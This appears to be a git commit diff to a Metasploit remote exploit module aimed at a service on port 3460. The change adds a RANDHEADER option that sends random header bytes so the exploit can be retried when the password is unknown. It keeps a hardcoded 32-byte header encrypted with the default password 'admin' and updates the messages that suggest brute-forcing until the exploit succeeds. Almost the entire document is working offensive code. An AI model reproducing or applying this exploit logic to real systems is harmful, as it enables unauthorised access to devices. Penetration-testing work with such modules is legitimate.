last changes done by gal, added RANDHEADER to single_exploit
parent
644d5029d5
commit
d8a5af7084
|
@ -86,6 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(3460),
|
||||
OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
|
@ -109,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if response[0, 16] == sig
|
||||
print_status("Password appears to be \"admin\"")
|
||||
else
|
||||
print_status("Unknown password - Bruteforce target can be tried and exploit launched until success.")
|
||||
print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
|
||||
end
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
@ -117,7 +118,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def single_exploit
|
||||
if datastore['RANDHEADER'] == true
|
||||
# Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
|
||||
header = rand_text(0x20)
|
||||
else
|
||||
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
|
||||
# We have a very good chance of succeeding even if the password was changed
|
||||
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
|
||||
end
|
||||
do_exploit(header)
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue